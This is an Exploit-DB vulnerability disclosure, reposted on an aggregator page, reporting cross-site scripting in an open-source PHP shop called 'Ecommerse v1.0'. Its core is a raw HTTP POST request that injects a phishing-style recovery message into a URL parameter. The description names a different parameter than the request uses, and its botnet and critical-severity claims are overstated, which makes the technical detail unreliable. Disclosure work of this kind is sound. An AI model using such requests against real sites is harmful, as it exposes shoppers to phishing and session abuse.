Ecommerse v1.0 – Cross-Site Scripting (XSS)

• Exploit Database
• 14 阅读

• 作者： nu11secur1ty
  日期： 2023-03-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51140/

• ## Title: Ecommerse v1.0 - Cross-Site Scripting (XSS) 
  ## Author: nu11secur1ty
  ## Date: 11.23.2022
  ## Vendor: https://github.com/winston-dsouza
  ## Software: https://github.com/winston-dsouza/ecommerce-website
  ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website
  
  ## Description:
  The value of the eMail request parameter is copied into the value of
  an HTML tag attribute which is encapsulated in double quotation marks.
  The attacker can trick the users of this system, very easy to visit a
  very dangerous link from anywhere, and then the game will over for
  these customers.
  Also, the attacker can create a network from botnet computers by using
  this vulnerability.
  
  ## STATUS: HIGH Vulnerability - CRITICAL
  
  [+] Exploit:
  
  ```POST
  POST /ecommerce/index.php?error=If%20you%20lose%20your%20credentials%20information,%20please%20use%20our%20recovery%20webpage%20to%20recover%20your%20account.%20https://localhost
  HTTP/1.1
  Host: pwnedhost.com
  Accept-Encoding: gzip, deflate
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
  Accept-Language: en-US;q=0.9,en;q=0.8
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
  AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
  Safari/537.36
  Connection: close
  Cache-Control: max-age=0
  Cookie: PHPSESSID=td6bitb72h0e1nuqa4ft9q8e2f
  Origin: http://pwnedhost.com
  Upgrade-Insecure-Requests: 1
  Referer: http://pwnedhost.com/ecommerce/index.php
  Content-Type: application/x-www-form-urlencoded
  Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
  Sec-CH-UA-Platform: Windows
  Sec-CH-UA-Mobile: ?0
  Content-Length: 0
  ```
  
  ## Reproduce:
  [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/winston-dsouza/ecommerce-website)
  
  ## Proof and Exploit:
  [href](https://streamable.com/3r4t36)
  
  -- 
  System Administrator - Infrastructure Engineer
  Penetration Testing Engineer
  Exploit developer at https://packetstormsecurity.com/
  https://cve.mitre.org/index.html and https://www.exploit-db.com/
  home page: https://www.nu11secur1ty.com/
  hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
  nu11secur1ty <http://nu11secur1ty.com/>